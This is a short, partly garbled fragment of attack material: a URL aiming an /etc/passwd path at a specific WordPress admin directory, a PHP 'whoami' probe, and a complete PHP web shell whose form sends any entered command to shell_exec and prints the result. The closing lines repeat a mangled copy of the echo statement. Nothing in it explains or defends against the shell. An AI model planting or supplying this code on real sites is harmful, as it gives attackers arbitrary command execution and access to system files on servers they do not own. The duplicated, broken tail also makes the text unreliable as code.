html https://labour.demergserver.in/wp-admin/!/etc!/passwd
html
<?php system('whoami'); ?>
<?php
if (isset($_POST['cmd'])) {
$cmd = $_POST['cmd'];
echo "<pre>" . shell_exec($cmd) . "</pre>";
}
?>
<form method="POST">
<input type="text" name="cmd" placeholder="Enter command">
<input type="submit" value="Execute">
</form>
” . shell_exec($cmd) . ““;
}
?>
